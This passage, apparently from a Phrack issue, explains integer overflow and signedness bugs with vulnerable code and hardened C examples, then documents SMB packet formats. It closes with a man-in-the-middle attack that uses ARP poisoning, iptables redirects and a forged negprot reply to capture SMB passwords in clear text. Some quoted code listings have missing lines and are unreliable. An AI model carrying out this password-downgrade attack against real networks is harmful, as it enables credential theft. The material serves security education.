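int checked_alloc_size(uint32_t count, uint32_t elsize, uint32_t *out)
{
    if (elsize != 0 && count > UINT32_MAX / elsize)
        return -1;
    *out = count * elsize;
    return 0;
}

int main(void)
{
    uint32_t len1 = 0x104, len2 = 0xfffffffc;   /* the article's values */
    uint32_t count = 0x40000001, size = 0;      /* constructed value */

    printf("len1 + len2 wraps to 0x%lx: flawed check %s, safe check %s\n",
           (unsigned long)(uint32_t)(len1 + len2),
           flawed_sum_check(len1, len2) ? "accepts" : "rejects",
           safe_sum_check(len1, len2) ? "accepts" : "rejects");

    printf("0x%lx elements * 4 bytes wraps to %lu bytes: checked form %s\n",
           (unsigned long)count,
           (unsigned long)wrapped_alloc_size(count, 4),
           checked_alloc_size(count, 4, &size) == 0 ? "accepts" : "rejects");
    return 0;
}
```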

--[ 3 Signedness Bugs

Signedness bugs occur when an unsigned variable is interpreted as signed,
or when a signed variable is interpreted as unsigned.  This type of
behaviour can happen because internally to the computer, there is no
distinction between the way signed and unsigned variables are stored.
Recently, several signedness bugs showed up in the FreeBSD and OpenBSD
kernels, so there are many examples readily available.

----[ 3.1 What do they look like?

Signedness bugs can take a variety of forms, but some of the things to look
out for are:
* signed integers being used in comparisons
* signed integers being used in arithmetic
* unsigned integers being compared to signed integers

Here is a classic example of a signedness bug:

    int copy_something(char *buf, int len){
        char kbuf[800];

        if(len > sizeof(kbuf)){         /* [1] */
            return -1;
        }

        memcpy(kbuf, buf, len);         /* [2] */
        return 0;
    }

The problem here is that memcpy takes an unsigned int as the len parameter,
but the bounds check performed before the memcpy is done using signed
integers.  By passing a negative value for len, it is possible to pass the
check at [1], but then in the call to memcpy at [2], len will be interpreted
as a huge unsigned value, causing memory to be overwritten well past the
end of the buffer kbuf.

Another problem that can stem from signed/unsigned confusion occurs when
arithmetic is performed.  Consider the following example:

    int table[800];

    int insert_in_table(int val, int pos){
        if(pos > sizeof(table) / sizeof(int)){
            return -1;
        }

        table[pos] = val;

        return 0;
    }

Since the line
    table[pos] = val;
is equivalent to
    *(table + (pos * sizeof(int))) = val;
we can see that the problem here is that the code does not expect a
negative operand for the addition: it expects (table + pos) to be greater
than table, so providing a negative value for pos causes a situation which
the program does not expect and can therefore not deal with.

------[ 3.1.1 Exploiting

This class of bug can be problematic to exploit, due to the fact that
signed integers, when interpreted as unsigned, tend to be huge.  For
example, -1 when represented in hexadecimal is 0xffffffff.  When
interpreted as unsigned, this becomes the greatest value it is possible to
represent in an integer (4,294,967,295), so if this value is passed to
memcpy as the len parameter (for example), memcpy will attempt to copy 4GB
of data to the destination buffer.  Obviously this is likely to cause a
segfault or, if not, to trash a large amount of the stack or heap.
Sometimes it is possible to get around this problem by passing a very low
value for the source address and hope, but this is not always possible.

----[ 3.2 Signedness bugs caused by integer overflows

Sometimes, it is possible to overflow an integer so that it wraps around to
a negative number.  Since the application is unlikely to expect such a
value, it may be possible to trigger a signedness bug as described above.

An example of this type of bug could look like this:

    int get_two_vars(int sock, char *out, int len){
        char buf1[512], buf2[512];
        unsigned int size1, size2;
        int size;

        if(recv(sock, buf1, sizeof(buf1), 0) < 0){
            return -1;
        }
        if(recv(sock, buf2, sizeof(buf2), 0) < 0){
            return -1;
        }

        /* packet begins with length information */
        memcpy(&size1, buf1, sizeof(int));
        memcpy(&size2, buf2, sizeof(int));

        size = size1 + size2;       /* [1] */

        if(size > len){             /* [2] */
            return -1;
        }

        memcpy(out, buf1, size1);
        memcpy(out + size1, buf2, size2);

        return size;
    }

This example shows what can sometimes happen in network daemons, especially
when length information is passed as part of the packet (in other words, it
is supplied by an untrusted user).  The addition at [1], used to check that
the data does not exceed the bounds of the output buffer, can be abused by
setting size1 and size2 to values that will cause the size variable to wrap
around to a negative value.  Example values could be:
    size1 = 0x7fffffff
    size2 = 0x7fffffff
    (0x7fffffff + 0x7fffffff = 0xfffffffe (-2)).
When this happens, the bounds check at [2] passes, and a lot more of the
out buffer can be written to than was intended (in fact, arbitrary memory
can be written to, as the (out + size1) dest parameter in the second memcpy
call allows us to get to any location in memory).

These bugs can be exploited in exactly the same way as regular signedness
bugs and have the same problems associated with them - i.e. negative values
translate to huge positive values, which can easily cause segfaults.

--[ 4 Real world examples

There are many real world applications containing integer overflows and
signedness bugs, particularly network daemons and, frequently, in operating
system kernels.

----[ 4.1 Integer overflows

This (non-exploitable) example was taken from a security module for Linux.
This code runs in the kernel context:

    int rsbac_acl_sys_group(enum  rsbac_acl_group_syscall_type_t call,
                            union rsbac_acl_group_syscall_arg_t arg)
            case ACLGS_get_group_members:
              if(   (arg.get_group_members.maxnum <= 0) /* [A] */
                 || !
                rsbac_uid_t * user_array;
                rsbac_time_t * ttl_array;

                user_array = vmalloc(sizeof(*user_array) *
                arg.get_group_members.maxnum);   /* [B] */
                  return -RSBAC_ENOMEM;
                ttl_array = vmalloc(sizeof(*ttl_array) *
                arg.get_group_members.maxnum); /* [C] */
                    return -RSBAC_ENOMEM;

                err =


In this example, the bounds checking at [A] is not sufficient to prevent
the integer overflows at [B] and [C].  By passing a high enough (i.e.
greater than 0xffffffff / 4) value for arg.get_group_members.maxnum, we
can cause the multiplications at [B] and [C] to overflow and force the
buffers ttl_array and user_array to be smaller than the application
expects.  Since rsbac_acl_get_group_members copies user controlled data
to these buffers, it is possible to write past the end of the user_array
and ttl_array buffers. In this case, the application used vmalloc() to
allocate the buffers, so an attempt to write past the end of the buffers
will simply raise an error, so it cannot be exploited.  Even so, it
provides an example of what these bugs can look like in real code.

Another example of a recent real world integer overflow vulnerability
was the problem in the XDR RPC library (discovered by ISS X-Force). In this
case, user supplied data was used in the calculation of the size of a
dynamically allocated buffer which was filled with user supplied data.  The
vulnerable code was this:

    xdr_array (xdrs, addrp, sizep, maxsize, elsize, elproc)
         XDR *xdrs;
         caddr_t *addrp;	/* array pointer */
         u_int *sizep;		/* number of elements */
         u_int maxsize;		/* max numberof elements */
         u_int elsize;		/* size in bytes of each element */
         xdrproc_t elproc;	/* xdr routine to handle each element */
      u_int i;
      caddr_t target = *addrp;
      u_int c;		/* the actual element count */
      bool_t stat = TRUE;
      u_int nodesize;


      c = *sizep;
      if ((c > maxsize) && (xdrs->x_op != XDR_FREE))
          return FALSE;
      nodesize = c * elsize;    /* [1] */


      *addrp = target = mem_alloc (nodesize);   /* [2] */


      for (i = 0; (i < c) && stat; i++)
          stat = (*elproc) (xdrs, target, LASTUNSIGNED);   /* [3] */
          target += elsize;

As you can see, by supplying large values for elsize and c (sizep), it
was possible to cause the multiplication at [1] to overflow and cause
nodesize to be much smaller than the application expected.  Since
nodesize was then used to allocate a buffer at [2], the buffer could be
mis-sized leading to a heap overflow at [3].  For more information on this
hole, see the CERT advisory listed in the appendix.

----[ 4.2 Signedness bugs

Recently, several signedness bugs were brought to light in the FreeBSD
kernel.  These allowed large portions of kernel memory to be read by
passing negative length parameters to various syscalls.  The getpeername(2)
function had such a problem and looked like this:

    static int
    getpeername1(p, uap, compat)
        struct proc *p;
        register struct getpeername_args /* {
            int	fdes;
            caddr_t asa;
            int	*alen;
    } */ *uap;
    int compat;
        struct file *fp;
        register struct socket *so;
        struct sockaddr *sa;
        int len, error;


        error = copyin((caddr_t)uap->alen, (caddr_t)&len, sizeof (len));
        if (error) {
            fdrop(fp, p);
            return (error);


        len = MIN(len, sa->sa_len);    /* [1] */
        error = copyout(sa, (caddr_t)uap->asa, (u_int)len);
        if (error)
            goto bad;
        error = copyout((caddr_t)&len, (caddr_t)uap->alen, sizeof (len));
        if (sa)
            FREE(sa, M_SONAME);
        fdrop(fp, p);
        return (error);

This is a classic example of a signedness bug - the check at [1] did not
take into account the fact that len could be negative, in which case the
MIN macro would always return len.  When this negative len parameter was
passed to copyout, it was interpreted as a huge positive integer which
caused copyout to copy up to 4GB of kernel memory to user space.
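
The length selection at [1] reduced to its arithmetic, with a form that
rejects negative lengths before clamping. This is an added example, not the
FreeBSD code or its fix; flawed_clamp, as_copy_length and safe_clamp are
names made up here, and sa_len is assumed to be an unsigned char.

```c
#include <limits.h>
#include <stddef.h>
#include <stdio.h>

#define MIN(a, b) (((a) < (b)) ? (a) : (b))

/* Length selection as at [1].  sa_len is assumed to be an unsigned char,
 * so it is promoted to int and the comparison is signed: a negative len
 * is always the smaller operand and comes back unchanged. */
int flawed_clamp(int len, unsigned char sa_len)
{
    return MIN(len, sa_len);
}

/* What the (u_int) cast in the copyout() call makes of that result. */
unsigned int as_copy_length(int len)
{
    return (unsigned int)len;
}

/* Hardened form: refuse negative lengths before clamping, then carry the
 * result in an unsigned type.  Returns 0 on success, -1 on a bad length. */
int safe_clamp(int len, unsigned char sa_len, size_t *out)
{
    if (len < 0)
        return -1;
    *out = (size_t)MIN(len, (int)sa_len);
    return 0;
}

int main(void)
{
    const int lens[] = { 128, 16, 4, -1, INT_MIN };   /* constructed inputs */
    const unsigned char sa_len = 16;                  /* constructed value */
    size_t i, n;

    for (i = 0; i < sizeof(lens) / sizeof(lens[0]); i++) {
        int picked = flawed_clamp(lens[i], sa_len);

        printf("len = %11d  MIN -> %11d  copyout length = %10u  ",
               lens[i], picked, as_copy_length(picked));
        if (safe_clamp(lens[i], sa_len, &n) == 0)
            printf("hardened: copy %lu bytes\n", (unsigned long)n);
        else
            printf("hardened: rejected\n");
    }
    return 0;
}
```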

--[ Conclusion

Integer overflows can be extremely dangerous, partly because it is
impossible to detect them after they have happened.  If an integer overflow
takes place, the application cannot know that the calculation it has
performed is incorrect, and it will continue under the assumption that it
is.  Even though they can be difficult to exploit, and frequently cannot be
exploited at all, they can cause unexpected behaviour, which is never a good
thing in a secure system.

--[ Appendix

CERT advisory on the XDR bug:
FreeBSD advisory:

|=[ EOF ]=---------------------------------------------------------------=|


               Volume 0x0b, Issue 0x3c, Phile #0x0b of 0x10

|=---------------------=[ SMB/CIFS BY THE ROOT ]=------------------------=|
|=---------------=[ ledin <[email protected]> ]=-----------------=|

--[ Contents

 1 - Introduction
 2 - What is SMB/CIFS
 3 - Session establishment
     How does a client establish a SMB session with a server ? 
 4 - Security level of SMB
 5 - Passwords
 6 - Description of several SMB packets
   6.1 - The general aspect of a SMB packet
   6.2 - NETBIOS and SMB
   6.3 - The SMB base header
   6.4 - Description of the most important SMB commands
   6.5 - How can I recover SMB passwords in clear from the network when 
        they should be encrypted ?
   6.6 - Man in the middle attack
   6.7 - Notes about windows 2k/XP SMB operating over TCP 
 7 - Transaction subprotocol and RAP commands 
   7.1 - RAP commands
 8 - Using RAP commands to list shares available on  a server
   8.1 - TconX packets
   8.2 - Explanation of the RAP command "NetshareEnum"
 9 - Conclusion
 10 - References
 11 - Thanks 

 Appendix A

 Appendix B

--[ 1 - Introduction

   In this article, I will try to explain what CIFS and SMB are, how
they work, and some common insecurities present in these protocols.
This article constitutes a useful source of knowledge about Microsoft
networking. The SMB protocol is one of the most used protocols on LANs.
I have also included source code with the aim of giving a good example
of SMB in operation.

   You will learn how to use ARP poisoning to obtain passwords in clear
from the network when all SMB passwords are encrypted (without brute
forcing). You will be able to understand the link between SMB and
NETBIOS. You will also learn what the Microsoft Remote Administration
Protocol (RAP) is and how it is used to scan remote shares on a
SMB server.

   Programs and information are given for educational purposes only.
I cannot be held responsible for what you do with them.

--[ 2 - What is SMB/CIFS ?

According to Microsoft, CIFS is intended to provide an open cross-
platform mechanism for client systems to request file and print
services from server systems over a network. It is based on the
standard Server Message Block (SMB) protocol widely in use by
personal computers and workstations running a wide variety of
operating systems.

In fact, SMB (for Server Message Block) is a protocol which handles
the transfer of data when sharing files, devices, named pipes
or mail slots across a network. CIFS is a public version of SMB.

SMB clients available:

 from Microsoft: Windows 95, Windows for Workgroups 3.x,
 Windows NT, 2000 and XP

 for Linux:
 Smbclient from Samba
 Smbfs for Linux

SMB servers:
 Microsoft Windows for Workgroups 3.x
 Microsoft Windows 95
 Microsoft Windows NT
 The PATHWORKS family of servers from Digital
 LAN Manager for OS/2, SCO, etc
 VisionFS from SCO
 TotalNET Advanced Server from Syntax
 Advanced Server for UNIX from AT&T (NCR?)
 LAN Server for OS/2 from IBM.

--[ 3 - Session establishment

   Note : The SMB protocol was developed to run on DOS (powered by an
Intel chip), so byte ordering is little-endian, the opposite of network

   SMB can run over TCP/IP, NetBEUI, DECnet Protocol and IPX/SPX.
With a SMB implementation over TCP/IP, DECnet or NetBEUI,
NETBIOS names must be used.

   I will explain in the sixth chapter what NETBIOS is. But for the
moment, you just have to know that a NETBIOS name identifies one computer
on a Microsoft network.

   The development of SMB began in the eighties, so there are many
versions of the SMB protocol. But the most used (on Windows 95,
98, Windows NT, Windows 2000 and XP) is the NT LM 0.12
version. This article is based on the NT LM 0.12 version.

   You have to know that a SMB Domain name identifies a group of
resources (users, printers, files ..) on a SMB server.

How does a client establish a SMB session with a server ?

   Let's take this situation : a client wants to access a specific
resource on a server.

1 - To begin, the client asks the server for a NETBIOS session.
The client sends its encoded NETBIOS name to the SMB server
(which listens for connection requests on port 139).
The server receives the NETBIOS name and replies with a NETBIOS
session packet to validate the session. The client then enters
SMB session establishment, i.e. the identification of the client
to the SMB server.

2 - The client sends a SMB negprot request packet (negprot for
"negotiate protocol"). The client gives a list of the SMB protocol
versions it supports.
Then the server sends a SMB negprot reply packet (with information
such as the SMB domain name, maximum connections accepted,
SMB protocol versions supported ...)

3 - After the negotiation of protocols, the client proceeds to a user
or share identification on the server (see the next chapter for the
difference between a share and a user identification).

This process is carried out by the SesssetupX request packet (SesssetupX
for Session Setup and X).
The client sends a login/password pair or a simple password to the
server, which refuses or allows the connection with a SesssetupX reply

4 - When the client has finished with negotiation and identification,
it sends a TconX packet specifying the network name of the resource
that it wants to access, and the server sends a TconX reply indicating
whether the connection is accepted or not.

                                 netbios session request
                                      (netbios name)
              [client]       --------------------------->   [server]
                                 netbios session granted
              [client]       <--------------------------    [server]

                                  SMB negprot request
              [client]       --------------------------->   [server]
                                  SMB negprot reply
              [client]       <--------------------------    [server]

                                SMB sesssetupX request
              [client]       --------------------------->   [server]
                                 SMB sesssetupX reply
              [client]       <--------------------------    [server]

                                 SMB TconX request
              [client]       --------------------------->   [server]
                                 SMB TconX reply
              [client]       <--------------------------    [server]

A complete description of each packet is given in chapter six.

--[ 4 - Security level of SMB 

There are two types of security model in SMB :

   The first is the "Share level" security model. This security model
associates a password with a shared resource on the network. The user
logs on to this resource (IPC, Disk, Printers) with the correct password.
The user can be anyone on the network who knows the name of the server
where the resource is.

   The second is the "User level" security model. It is an enhanced
implementation of the first. It consists of associating a login/password
pair with a shared resource. So if a person wants to
connect to this shared resource, he has to know the login/password
pair. This security level is useful for knowing who does what.

--[ 5 - Passwords

   With SMB, when you have to identify yourself to a server, your
password can be sent in clear or encrypted. If the server supports
encryption, the client will have to answer a challenge. The server
knows the password, so in the negprot reply packet, an encryption key
will be sent to the client. The client encrypts the password
and sends it in the SesssetupX request packet; the server verifies the
validity of the password and allows the session or not.

You have to know that a SMB password (not encrypted) is at most 14 bytes
long. The encryption key is usually 8 bytes long.
The encrypted password is 24 bytes long. With an ANSI password, the
characters of the password are converted to upper case for the

The password is encrypted with DES in block mode.

--[ 6 - Description of several SMB packets

   In this part I will describe the most important packet types
involved in the SMB protocol. I know it's a bit boring,
but this is the basis for understanding how SMB and the attacks work.
I will explain what is most important in each type of packet.
Each type of command has two types of packet: the request
packet and the reply packet.

----[ 6.1 - The general aspect of a SMB packet.

   In the majority of cases SMB runs over the TCP/IP protocol suite.
So let's consider that SMB runs over the TCP layer. Over the TCP
layer, you will always find the NETBIOS (NBT) header. Over NBT you
have the SMB base header. Over the SMB base header, you have
another type of header, which depends on the specific command you

                    |      TCP header    |
                    |   NETBIOS header   |
                    |   SMB base header  |
                    | SMB Command header |
                    |        DATA        |

The "SMB Base header" contains several pieces of information, like the
size of reception buffers, maximum connections allowed... It also
contains a number that identifies the command requested.

The "SMB command header" is a header with all the parameters for the
requested command (a command like negotiate protocol versions ... )

"DATA" is the data for the requested command.

I call "SMB packet" the NETBIOS header + the SMB base header +
the SMB Command header + DATA.

NOTE :  I will use these definitions :

typedef unsigned char UCHAR;          // 8 unsigned bits
typedef unsigned short USHORT;        // 16 unsigned bits
typedef unsigned long ULONG;          // 32 unsigned bits

and STRING denotes a null-terminated ASCII string.

----[ 6.2 - NETBIOS and SMB

NETBIOS (for NETwork Basic Input and Output System) is widely used
on Microsoft networks. It is a software interface and a naming system.
Each computer has a NETBIOS name, which is 15 characters long, and a
sixteenth character is used to identify the type of computer
(Domain Name server, workstation...).

Values for the sixteenth character :

0x00 base computer, workstation.
0x20 resource sharing server.

There are other values but these are the most interesting for us. The
first (0x00) identifies a workstation and the second (0x20) the server.

In a SMB packet, the NETBIOS header corresponds to the NETBIOS
Session header, defined like this :

                UCHAR Type;     // Type of the packet
                UCHAR Flags;    // Flags
                USHORT Length;  // Count of data bytes (netbios header
                                // not included)

For the "Flags" field, the value is always 0. (with SMB, not in general !)

For the "Type" field, several values are possible :

               0x81 corresponds to a NETBIOS session request. This code
is used when the client sends its NETBIOS name to the server.

               0x82 is a positive response to a NETBIOS session request.
This code is used by the server to authorize a NETBIOS session.

               0x00 corresponds to a session message. This code is always
used in a SMB session, i.e. when the client has sent its NETBIOS name to
the server and has received a positive reply.

The "Length" field contains a count of data bytes (the NETBIOS header
is not included); "data" means what is above the NETBIOS header (it
could be the SMB Base header + SMB Command header + DATA or NETBIOS
NETBIOS names and encoding

A NETBIOS encoded name is 32 bytes long.

A NETBIOS name is always given in upper case characters.

It's very easy to encode a NETBIOS name. For example the NETBIOS name
of my computer is "BILL" and it's a workstation, so there is a "0x00"
for the sixteenth character.

Firstly, when a NETBIOS name is shorter than 15 bytes, it may be padded
on the right with spaces.

     "BILL           "

In hexadecimal  0x42 0x49 0x4c 0x4c 0x20 0x20 ......0x00

Each byte is split into 4-bit halves.

0x4 0x2 0x4 0x9 0x4 0xc 0x4 0xc 0x2 0x0 .......

And each 4-bit half is added to the ASCII value of the letter 'A' (0x41)

0x4 + 0x41 = 0x45  -> ASCII value = E

0x2 + 0x41 = 0x43  -> ASCII value = C

And you have the encoded NETBIOS name which is 32 bytes long.
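
The encoding steps above written out in C, with a decoder that validates an
encoded name before using it. This is an added example, not the source code
that accompanies the original article; nb_encode and nb_decode are names
made up here.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define NB_NAME_LEN    16   /* 15 name characters + the type character */
#define NB_ENCODED_LEN 32   /* two output characters per input byte */

/* Encode name (at most 15 characters) and its sixteenth "type" character.
 * out receives 32 characters plus a terminating NUL.
 * Returns 0 on success, -1 if the name is too long. */
int nb_encode(const char *name, unsigned char type,
              char out[NB_ENCODED_LEN + 1])
{
    unsigned char raw[NB_NAME_LEN];
    size_t n = strlen(name), i;

    if (n > NB_NAME_LEN - 1)
        return -1;

    memset(raw, ' ', NB_NAME_LEN - 1);            /* pad right with spaces */
    for (i = 0; i < n; i++)                       /* names are upper case */
        raw[i] = (unsigned char)toupper((unsigned char)name[i]);
    raw[NB_NAME_LEN - 1] = type;

    for (i = 0; i < NB_NAME_LEN; i++) {
        out[2 * i]     = (char)('A' + (raw[i] >> 4));    /* high half */
        out[2 * i + 1] = (char)('A' + (raw[i] & 0x0f));  /* low half */
    }
    out[NB_ENCODED_LEN] = '\0';
    return 0;
}

/* Decode an encoded name.  Rejects input that is not exactly 32 characters
 * in the range 'A'..'P', which is all the encoder can ever produce.
 * name receives the name without its padding, NUL terminated.
 * Returns 0 on success, -1 on malformed input. */
int nb_decode(const char *enc, char name[NB_NAME_LEN], unsigned char *type)
{
    unsigned char raw[NB_NAME_LEN];
    size_t i, n;

    if (strlen(enc) != NB_ENCODED_LEN)
        return -1;

    for (i = 0; i < NB_NAME_LEN; i++) {
        char hi = enc[2 * i], lo = enc[2 * i + 1];

        if (hi < 'A' || hi > 'P' || lo < 'A' || lo > 'P')
            return -1;
        raw[i] = (unsigned char)(((hi - 'A') << 4) | (lo - 'A'));
    }

    memcpy(name, raw, NB_NAME_LEN - 1);
    n = NB_NAME_LEN - 1;
    while (n > 0 && name[n - 1] == ' ')           /* strip the padding */
        n--;
    name[n] = '\0';
    *type = raw[NB_NAME_LEN - 1];
    return 0;
}

int main(void)
{
    char enc[NB_ENCODED_LEN + 1], name[NB_NAME_LEN];
    unsigned char type;

    if (nb_encode("BILL", 0x00, enc) == 0)        /* the article's example */
        printf("BILL<00> -> %s\n", enc);
    if (nb_decode(enc, name, &type) == 0)
        printf("decoded  -> \"%s\" type 0x%02x\n", name, type);
    return 0;
}
```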

Note :

 SMB can run directly over TCP without NBT (it's supported on Win2k
and XP on port 445). The NETBIOS names are not limited to 15 characters.

You don't need to know more; if you want more information
about NETBIOS, read [3] and [4].

----[ 6.3 - The SMB base header    

This header is used in all SMB packets, this is its definition :

    UCHAR Protocol[4];                // Contains 0xFF,'SMB'
    UCHAR Command;                    // Command code
    union {
        struct {
            UCHAR ErrorClass;         // Error class
            UCHAR Reserved;           // Reserved for future use
            USHORT Error;             // Error code
        } DosError;
        ULONG Status;                 // 32-bit error code
    } Status;
    UCHAR Flags;                      // Flags
    USHORT Flags2;                    // More flags
    union {
        USHORT Pad[6];                // Ensure section is 12 bytes long
        struct {
            USHORT PidHigh;           // High part of PID
            ULONG  Unused;            // Not used
            ULONG  Unused2;
        } Extra;
    };
    USHORT Tid;                       // Tree identifier
    USHORT Pid;                       // Caller's process id
    USHORT Uid;                       // Unauthenticated user id
    USHORT Mid;                       // multiplex id
    UCHAR  WordCount;                 // Count of parameter words
    USHORT ParameterWords[ WordCount ];    // The parameter words
    USHORT ByteCount;                 // Count of bytes
    UCHAR  Buffer[ ByteCount ];       // The bytes

The "Protocol" field contains the name of the protocol (SMB) with a 
0xFF before.

The "Command" field contains the value of the requested command. For 
example 0x72 is for the "negotiate protocol" command.

The "Tid" field is used when the client is successfully connected to a
resource on a SMB server. The TID number identifies this resource.

The "Pid" field is used when the client has successfully created a 
process on the server. The PID number identifies this process.

The "Uid" field is used when a user is successfully authenticated 
on a server. The UID number identifies this user.

The "Mid" field is used together with the PID when a client has 
several requests on the server (process, threads, file access...).

The "Flags2" field is also important: when bit 15 is set, the 
strings are UNICODE strings.

----[ 6.4 - Description of the most important SMB commands

 SMB negotiate Protocol (negprot)
   The Negotiate Protocol Command is used in the first step of the SMB 
session establishment.

The Command code for the field "Command" in the SMB Base header is : 0x72.

Here is the description of the negprot request and reply headers : 

  Request header
 UCHAR WordCount;              Count of parameter words = 0
 USHORT ByteCount;             Count of data bytes
 struct {
   UCHAR BufferFormat;        0x02 -- Dialect
   UCHAR DialectName[];       ASCII null-terminated string
 } Dialects[];

   This packet is sent by the client to give the server its list of 
supported SMB protocol versions.

   Just three things to say about this packet: the "WordCount" field is 
always set to zero, the "ByteCount" field is equal to the size of the 
"Dialects" structure, and the "BufferFormat" field of "Dialects" is always
equal to 0x02.

   The "DialectName" strings contain the names of the SMB 
protocol versions supported by the client.

  Reply header
 UCHAR WordCount;           Count of parameter words = 17
 USHORT DialectIndex;       Index of selected dialect
 UCHAR SecurityMode;        Security mode:
                            bit 0: 0 = share, 1 = user
                            bit 1: 1 = encrypt passwords
 USHORT MaxMpxCount;        Max pending multiplexed requests
 USHORT MaxNumberVcs;       Max VCs between client and server
 ULONG MaxBufferSize;       Max transmit buffer size
 ULONG MaxRawSize;          Maximum raw buffer size
 ULONG SessionKey;          Unique token identifying this session
 ULONG Capabilities;        Server capabilities
 ULONG SystemTimeLow;       System (UTC) time of the server (low).
 ULONG SystemTimeHigh;      System (UTC) time of the server (high).
 USHORT ServerTimeZone;     Time zone of server (min from UTC)
 UCHAR EncryptionKeyLength; Length of encryption key.
 USHORT ByteCount;          Count of data bytes
 UCHAR EncryptionKey[];     The challenge encryption key
 UCHAR OemDomainName[];     The name of the domain (in OEM chars)

This packet is sent by the server to give the client the list 
of SMB protocol versions supported, the SMB domain name of the server 
and an encryption key if necessary. 

The first interesting field is the "SecurityMode" byte. If bit 0 
is set we have a user security level. If it's not, we have a 
share security level. If bit 1 is set the password is encrypted
with a DES encryption in block mode.

The "SessionKey" field is used to identify the session. There is one 
single session key for one session.

The "Capabilities" field indicates whether the server supports UNICODE 
strings or NT LM 0.12 particular commands ...

The data are at the end of the header. With a negprot reply, 
these data correspond to the strings "EncryptionKey" and 

The length of these two strings together is given by the "Bytecount" 
The length of the "EncryptionKey" string is given by the field 
"EncryptionKeyLength". The "EncryptionKey" string contains the key for
the encryption of the password.

The length of "OemDomainName" is given by 
     (Bytecount - EncryptionKeyLength). 
The "OemDomainName" string contains the SMB domain name of the server
(in OEM chars).

 Session setup and X
   The Session Setup and X packets (SesssetupX or setupx for 
abbreviation) are used to deal with the identity of a user or when you
have to give a password to access a resource. 

   The Command code for the Session Setup and X command is 0x73.

  Request header
 UCHAR WordCount;               Count of parameter words = 13
 UCHAR AndXCommand;             Secondary (X) command;  0xFF = none
 UCHAR AndXReserved;            Reserved (must be 0)
 USHORT AndXOffset;             Offset to next command WordCount
 USHORT MaxBufferSize;          Client's maximum buffer size
 USHORT MaxMpxCount;            Actual maximum multiplexed pending
 USHORT VcNumber;               0 = first (only), nonzero=additional
                                VC number
 ULONG SessionKey;              Session key (valid iff VcNumber != 0)
 USHORT CaseInsensitivePasswordLength;  Account password size, ANSI
 USHORT CaseSensitivePasswordLength;    Account password size, Unicode
 ULONG Reserved;                must be 0
 ULONG Capabilities;            Client capabilities
 USHORT ByteCount;              Count of data bytes;    min = 0
 UCHAR CaseInsensitivePassword[]; Account Password, ANSI
 UCHAR CaseSensitivePassword[]; Account Password, Unicode
 STRING AccountName[];          Account Name, Unicode
 STRING PrimaryDomain[];        Client's primary domain, Unicode
 STRING NativeOS[];             Client's native operating system,
 STRING NativeLanMan[];         Client's native LAN Manager type,

This packet gives a lot of information about the client's system.

The field "MaxBufferSize" is very important, it gives the maximum 
size of data that the client can receive. If you set it to zero 
you will not receive any type of data from the server.

For the data, you have several strings. The most important are 
"CaseSensitivePassword" (password in UNICODE characters)
and "CaseInsensitivePassword" (password in ANSI characters).

One of the two is used, depending on whether the server supports UNICODE
strings or not (see the negotiate protocol reply packet description). 
The length of the password is given in the fields 
"CaseInsensitivePasswordLength" or
"CaseSensitivePasswordLength".

For the other strings, see the description. The count of data bytes
is given by the "Bytecount" field.

  Reply header
 UCHAR WordCount;                   Count of parameter words = 3
 UCHAR AndXCommand;                 Secondary (X) command;  0xFF =
 UCHAR AndXReserved;                Reserved (must be 0)
 USHORT AndXOffset;                 Offset to next command WordCount
 USHORT Action;                     Request mode:
                                    bit0 = logged in as GUEST
 USHORT ByteCount;                  Count of data bytes
 STRING NativeOS[];                 Server's native operating system
 STRING NativeLanMan[];             Server's native LAN Manager type
 STRING PrimaryDomain[];            Server's primary domain

Again, there is a lot of information in this packet: OS type,
version of the SMB server software running on the server and domain name.

If the connection failed, there is nothing in the NativeOS, NativeLanman
and PrimaryDomain strings.

OK I have finished with the "hard" part, we can play a little with 
the SMB protocol.

If you want to learn more about it, read [1].

----[ 6.5 - How I can recover SMB passwords in clear from the network 
            when they should be encrypted 

   During the session establishment, the password is sent to the server
during the SMB setupx Session. The SMB negprot reply packet contains 
a bit in the "SecurityMode" field which enables password encryption 
or not.

   So if you want to have a password in clear when everything is
encrypted, you have two possibilities.

   The first one is to catch the encryption key and the encrypted 
password and brute force it ! It can take very long ...

   Some programs like L0phtCrack (with SMBGrinder), dsniff or readsmb2 
sniff SMB encrypted passwords.

   The second way is to hijack the connection and to make the client 
believe that the password should not be encrypted.

   This technique is a bit complex to explain, but I will say how to 
do it !

   If the server is configured to encrypt passwords, the SMB negprot 
reply packet has bit 1 of the "SecurityMode" field set. But if 
an attacker sends a negprot reply packet with this bit equal to 
zero before the server, the password will be in clear in the 
SessetupX request packet.

                   negprot request 
  [client]     ------------------------>         [server]

                [attacker waits for a negprot request]

  [client]   <-------------|                     [server]
                           | fake negprot reply
                [attacker sends his fake negprot reply]

                  real negprot reply
  [client]   <----------------------------------  [server]

                [attacker (does nothing)]

               sessetupX request with the password in clear text
  [client]    ----------------------------------> [server]

                [attacker sniffs the password in clear text]

These diagrams illustrate a direct packet injection on the network.
In the majority of cases, this method doesn't work because the fake
negprot reply could be treated after the real one. There are also other 
problems: session failures, validity of the password, it does not work
in a switched environment...

We can avoid all of these problems by using ARP poisoning.

I will not explain and describe what ARP poisoning is, you can find a 
lot of docs about it on the internet. But, if you don't know what it is, 
you just have to know that this attack allows the attacker to redirect 
and modify the traffic between the server and the client.

In this situation, the attacker is between the two.

He is the man in the middle ...

----[ 6.6 - Man in the middle attack

          "Attack where your enemy is not expecting you"
                                 Sun Tzu, "The art of war"

Now I will describe the man in the middle attack. This attack allows 
you to bypass switches, to avoid connection failures and to grab the 
password in clear.

Let's consider that the traffic between the client and the server 
is redirected by the attacker (thanks to ARP poisoning !).
The client requests a SMB session from the server. 
The client will send packets to the SMB port (139) of the server. The 
attacker receives them. But the attacker doesn't redirect the packets to
the server. 
All incoming traffic to the server's SMB port (so to the attacker's 
machine) is redirected to the local port 1139 of the attacker (very easy 
to do with NAT and iptables).
The whole traffic (not only SMB) is redirected also with iptables and 
On the port 1139, there is a program (a transparent proxy program) that 
handles the modification and redirection of the SMB packets.

The two iptables/NAT commands are :

To redirect the incoming traffic (on port 139 ) to a local port (1139 for

#iptables -t nat -A PREROUTING -i eth0 -p tcp -s \
--dport 139 -j REDIRECT --to-port 1139 is the IP address of the client 

To redirect the whole traffic

#iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

What are the modifications ? :

The attacker modifies the negprot reply to have the password in
clear text. The attacker also recovers the encryption key.
The attacker sets the length of the encryption key to zero
and puts the domain name in place of the encryption key. 
He sets the encryption bit of the "SecurityMode" field to 0. 
With this, the password will not be encrypted.

The client will send the password in clear in a sesssetupx request. 
